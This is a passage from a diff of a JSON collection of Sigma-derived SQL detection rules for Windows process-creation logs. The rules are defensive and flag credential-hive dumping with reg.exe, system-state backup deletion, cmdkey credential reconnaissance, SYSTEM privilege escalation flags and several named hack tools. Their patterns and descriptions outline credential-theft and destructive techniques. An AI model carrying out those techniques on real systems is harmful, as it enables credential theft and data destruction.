'%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_webshell_hacking.yml" + "filename": "proc_creation_win_webshell_spawn.yml" }, { - "title": "Disable Important Scheduled Task", - "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "title": "Process Creation Using Sysnative Folder", + "id": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", "status": "experimental", - "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE 'C:\\\\Windows\\\\Sysnative\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_disable.yml" + "filename": "proc_creation_win_susp_sysnative.yml" }, { - "title": "Suspicious ZipExec Execution", - "id": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", - "status": "test", - "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", + "title": "System Network Connections Discovery Via Net.EXE", + "id": "1c67a717-32ba-409b-a45d-0fb704a73a81", + "status": "experimental", + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.discovery", + "attack.t1049" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%/generic:Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/user:%' ESCAPE '\\') OR (CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((CommandLine LIKE '% use' ESCAPE '\\' OR CommandLine LIKE '% sessions' ESCAPE '\\') OR (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% sessions %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_zipexec.yml" + "filename": "proc_creation_win_net_network_connections_discovery.yml" }, { - "title": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", - "id": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", - "status": "test", - "description": "dotnet.exe will execute any DLL and execute unsigned code", - "author": "Beyu Denis, oscd.community", + "title": "Import LDAP Data Interchange Format File Via Ldifde.EXE", + "id": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", + "status": "experimental", + "description": "Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.\n", + "author": "@gott_cyber", "tags": [ - "attack.execution", - "attack.t1218" + "attack.command_and_control", + "attack.defense_evasion", + "attack.t1218", + "attack.t1105" ], "falsepositives": [ - "System administrator Usage" + "Since the content of the files are unknown, false positives are expected" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dotnet.exe' ESCAPE '\\' OR OriginalFileName = '.NET Host') AND (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.csproj' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND (CommandLine LIKE '%-i%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_dotnet.yml" + "filename": "proc_creation_win_ldifde_file_load.yml" }, { - "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", - "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "title": "Suspicious Parent Double Extension File Execution", + "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", "status": "experimental", - "description": "Detects usage of cmdkey to look for cached credentials on the system", - "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect execution of suspicious double extension files in ParentCommandLine", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.005" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%.doc.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.doc.js' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmdkey_recon.yml" + "filename": "proc_creation_win_susp_double_extension_parent.yml" }, { - "title": "Hidden Powershell in Link File Pattern", - "id": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", - "status": "test", - "description": "Detects events that appear when a user click on a link file with a powershell command in it", + "title": "DirLister Execution", + "id": "b4dc61f5-6cce-468e-a608-b48b469feaa2", + "status": "experimental", + "description": "Detect the usage of \"DirLister.exe\" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ - "Legitimate commands in .lnk files" + "Legitimate use by users" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.lnk%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'DirLister.exe' OR NewProcessName LIKE '%\\\\dirlister.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_embed_exe_lnk.yml" + "filename": "proc_creation_win_dirlister_execution.yml" }, { - "title": "Potential Persistence Via Netsh Helper DLL", - "id": "56321594-9087-49d9-bf10-524fe8479452", - "status": "test", - "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", - "author": "Victor Sergeev, oscd.community", + "title": "Potential Privilege Escalation To LOCAL SYSTEM", + "id": "207b0396-3689-42d9-8399-4222658efc99", + "status": "experimental", + "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.007", - "attack.s0108" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" + "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" }, { - "title": "Unmount Share Via Net.EXE", - "id": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", + "title": "Renamed Jusched.EXE Execution", + "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "status": "test", - "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", + "author": "Markus Neis, Swisscom", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1070.005" + "attack.t1036.003" ], "falsepositives": [ - "Administrators or Power users may remove their shares via cmd line" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%share%' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (NewProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_share_unmount.yml" + "filename": "proc_creation_win_renamed_jusched.yml" }, { - "title": "HackTool - TruffleSnout Execution", - "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", - "status": "experimental", - "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "title": "SystemStateBackup Deleted Using Wbadmin.EXE", + "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "status": "test", + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'TruffleSnout.exe' OR NewProcessName LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_trufflesnout.yml" + "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" }, { - "title": "Suspicious Shells Spawn by SQL Server", - "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "title": "HackTool - Stracciatella Execution", + "id": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "status": "experimental", - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "author": "FPT.EagleEye Team, wagga", + "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.execution", + "attack.defense_evasion", + "attack.t1059", + "attack.t1562.001" + ], + "falsepositives": [ + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Stracciatella.exe' ESCAPE '\\' OR OriginalFileName = 'Stracciatella.exe' OR Description = 'Stracciatella' OR (Hashes LIKE '%SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a%' ESCAPE '\\') OR sha256 IN ('9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956', 'fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a')))" ], - "filename": "proc_creation_win_mssql_susp_child_process.yml" + "filename": "proc_creation_win_hktl_stracciatella_execution.yml" }, { - "title": "Suspicious Schtasks Execution AppData Folder", - "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "title": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE", + "id": "01c42d3c-242d-4655-85b2-34f1739632f7", "status": "experimental", - "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects usage of Dsacls to grant over permissive permissions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate administrators granting over permissive permissions to users" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND CommandLine LIKE '% /G %' ESCAPE '\\' AND (CommandLine LIKE '%GR%' ESCAPE '\\' OR CommandLine LIKE '%GE%' ESCAPE '\\' OR CommandLine LIKE '%GW%' ESCAPE '\\' OR CommandLine LIKE '%GA%' ESCAPE '\\' OR CommandLine LIKE '%WP%' ESCAPE '\\' OR CommandLine LIKE '%WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_appdata_local_system.yml" + "filename": "proc_creation_win_dsacls_abuse_permissions.yml" }, { - "title": "HackTool - SharpChisel Execution", - "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "title": "PUA - Wsudo Suspicious Execution", + "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "status": "experimental", - "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.execution", + "attack.privilege_escalation", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentProcessName LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharp_chisel.yml" + "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" }, { - "title": "Esentutl Gather Credentials", - "id": "7df1713a-1a5b-4a4b-a071-dc83b144a101", + "title": "WinDbg/CDB LOLBIN Usage", + "id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", "status": "test", - "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", - "author": "sam0x90", + "description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.003" + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1218", + "attack.t1127" ], "falsepositives": [ - "To be determined" + "Legitimate use of debugging tools" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%esentutl%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cdb.exe' ESCAPE '\\' OR OriginalFileName = 'CDB.Exe') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -cf %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_esentutl_params.yml" + "filename": "proc_creation_win_lolbin_cdb.yml" }, { - "title": "Wusa Extracting Cab Files", - "id": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", - "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Dumping of Sensitive Hives Via Reg.EXE", + "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", + "status": "test", + "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", "tags": [ - "attack.execution" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" ], "falsepositives": [ - "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction.yml" + "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" }, { - "title": "DLL Loaded via CertOC.EXE", - "id": "242301bc-f92f-4476-8718-78004a6efd9f", + "title": "Suspicious Network Command", + "id": "a29c1813-ab1f-4dde-b489-330b952e91ae", "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", - "author": "Austin Songer @austinsonger", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1016" ], "falsepositives": [ - "Unknown" + "Administrator, hotline ask to user" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' 